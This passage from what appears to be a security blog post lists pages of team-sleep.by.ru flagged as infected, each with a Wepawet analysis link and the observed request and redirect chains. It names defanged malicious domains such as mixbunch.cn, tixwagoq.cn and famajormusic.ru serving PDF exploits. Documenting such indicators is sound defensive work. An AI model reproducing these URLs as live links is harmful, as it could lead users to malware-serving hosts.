/&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="94" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="92" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;br /&gt;&lt;br /&gt;hxxp://5rublei.com/unique/index.php &lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EckUtJI/AAAAAAAAAZA/KaCw90pWY3Y/s1600-h/demo.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EckUtJI/AAAAAAAAAZA/KaCw90pWY3Y/s320/demo.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697406846514322" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/gold.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=c0ca85dbda05d075a7c97ab22a8630db&amp;amp;t=1240189158&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requests:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="94" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="92" style="padding:10px"&gt;hxxp://team-sleep.by.ru/gold.html&lt;br /&gt;    hxxp://5rublei.com/unique/index.php&lt;br /&gt;    hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;    hxxp://mixbunch.cn/thread.html&lt;br /&gt;    hxxp://mixbunch.cn/golf.html&lt;br /&gt;    hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;    hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;    hxxp://mixbunch.cn/bowling.html&lt;br /&gt;    hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;    hxxp://famajormusic.ru/jjkj/pdf.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="94" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="92" style="padding:10px"&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EusanxI/AAAAAAAAAZI/zrU01fbIIBI/s1600-h/gold.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EusanxI/AAAAAAAAAZI/zrU01fbIIBI/s320/gold.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697411712294674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/googleanalyticsru.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=e453f768a057c80b81f2e547bbbf8242&amp;amp;t=1240189161&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Requests:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/googleanalyticsru.html&lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://sunmaiamibich.ru/&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:  &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EpPf9zI/AAAAAAAAAZQ/LBri95fd2Ac/s1600-h/googleanalyticsru.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 218px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EpPf9zI/AAAAAAAAAZQ/LBri95fd2Ac/s320/googleanalyticsru.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697410248832818" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/media.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=829cb08a1a36b11a84fc82f50448f8e5&amp;amp;t=1240189172&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requests:&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/media.html&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7E1tkULI/AAAAAAAAAZY/Q9ul0fJm5TQ/s1600-h/media.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7E1tkULI/AAAAAAAAAZY/Q9ul0fJm5TQ/s320/media.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697413596172466" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/menu.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&amp;amp;t=1240190210&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Requests:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/menu.html&lt;br /&gt;hxxp://bizoplata.ru/pay.html?&lt;br /&gt;hxxp://bizoplata.ru/ballast.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://bizoplata.ru/post.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;br /&gt;&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzeRS7I/AAAAAAAAAZg/cHupDQQvvAA/s1600-h/menu.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 239px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzeRS7I/AAAAAAAAAZg/cHupDQQvvAA/s320/menu.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773772393394" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/news.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=a370e072f26ab0fc502ef5f090100f2d&amp;amp;t=1240189203&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;Requests: &lt;br /&gt;&lt;br /&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt; hxxp://moneypuller.site90.net/images/gallery/index.php&lt;br /&gt;      hxxp://error.000webhost.com/not_found.html&lt;br /&gt;      hxxp://www.000webhost.com/?id=1&lt;br /&gt;      hxxp://www.000webhost.com/&lt;br /&gt;      hxxp://mixbunch.cn/thread.html&lt;br /&gt;      hxxp://mixbunch.cn/golf.html&lt;br /&gt;      hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;      hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;      hxxp://mixbunch.cn/bowling.html&lt;br /&gt;      hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;      hxxp://famajormusic.ru/jjkj/pdf.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Redirects: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzSNmzI/AAAAAAAAAZo/GZ5JJt8Rlck/s1600-h/news.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzSNmzI/AAAAAAAAAZo/GZ5JJt8Rlck/s320/news.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773721819954" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo2.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=b0240b35b771b8d402b49bf3e7827572&amp;amp;t=1240189200&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Requests:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://bizoplata.ru/pay.html?&lt;br /&gt;hxxp://bizoplata.ru/ballast.html&lt;br /&gt;hxxp://bizoplata.ru/post.html&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;br /&gt;&lt;br /&gt;hxxp://5rublei.com/unique/index.php &lt;br /&gt;hxxp://tochtonenado.com/yes/index.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7aAA8vSI/AAAAAAAAAZw/qH8G6pZTEtY/s1600-h/photo2.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 244px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7aAA8vSI/AAAAAAAAAZw/qH8G6pZTEtY/s320/photo2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697777139072290" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt; hxxp://team-sleep.by.ru/poem.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=195a5226ceb60d0db3a38b2a8da4e763&amp;amp;t=1240189221&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Requests:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://bizoplata.ru/pay.html?&lt;br /&gt;hxxp://bizoplata.ru/ballast.html&lt;br /&gt;hxxp://bizoplata.ru/post.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7aKHSibI/AAAAAAAAAZ4/tbLknXqRpfk/s1600-h/peom.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 286px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7aKHSibI/AAAAAAAAAZ4/tbLknXqRpfk/s320/peom.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697779850021298" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/press_reviews.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=13731fd005d76fdaf4594868bf38fd66&amp;amp;t=1240189277&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Requests:    &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;br /&gt;&lt;br /&gt;hxxp://5rublei.com/unique/index.php &lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7afXhRaI/AAAAAAAAAaA/6vezlc7icsk/s1600-h/press_review.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7afXhRaI/AAAAAAAAAaA/6vezlc7icsk/s320/press_review.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697785555240354" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/team-sleep.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=279207d4fff5b20adcd1fb624b3740ab&amp;amp;t=1240189275&amp;amp;type=js" target="_blank"&gt;Anaysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Redirects:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Redirects:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="94" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="92" style="padding:10px"&gt;hxxp://tixwagoq.cn/in.cgi?4 &lt;br /&gt;hxxp://paylayos.cn/nuc/index.php &lt;br /&gt;&lt;br /&gt;hxxp://5rublei.com/unique/index.php &lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nlBq_FI/AAAAAAAAAaY/KrDYgKhjdnU/s1600-h/team-sleep.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 313px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nlBq_FI/AAAAAAAAAaY/KrDYgKhjdnU/s320/team-sleep.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698010412514386" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/gmail.php&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=9fc1f920da916d7b64e66c3eec43d1cf&amp;amp;t=1240189268&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requests:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://counnter.cn/top100_00.js &lt;br /&gt;hxxp://counnter.cn/z/count.php?o=1 &lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;    Redirects:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://5rublei.com/unique/index.php &lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7nW9iHZI/AAAAAAAAAaQ/eIyVgSgHQzA/s1600-h/gmail.php.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7nW9iHZI/AAAAAAAAAaQ/eIyVgSgHQzA/s320/gmail.php.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698006637059474" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/haitou.php&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=29b0af53df0979e7246d9e89e09352cc&amp;amp;t=1240189409&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requests:&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/in.php&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=6f6f7fb6acc398f4a4e0d55b8d675936&amp;amp;t=1240189407&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requests: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://www.rogercombs.org/index.php&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo/team.html&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=022ec04155a750ee3f480d2f85791fc7&amp;amp;t=1240189403&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requests: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://analytics-google.info/s/urchin.js&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://famajormusic.ru/jjkj/pdf.php&lt;br /&gt;hxxp://77.221.133.172/.if/go.html?&lt;br /&gt;hxxp://by.ru/info/?where &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;************&lt;br /&gt;Infected page: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://team-sleep.by.ru/photo/wallz.html&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=713f99048cdb15abc6d8d4362f64dc89&amp;amp;t=1240189401&amp;amp;type=js" target="_blank"&gt;Analysis&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;Requests: &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="38" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="36" style="padding:10px"&gt;hxxp://analytics-google.info/s/urchin.js&lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br 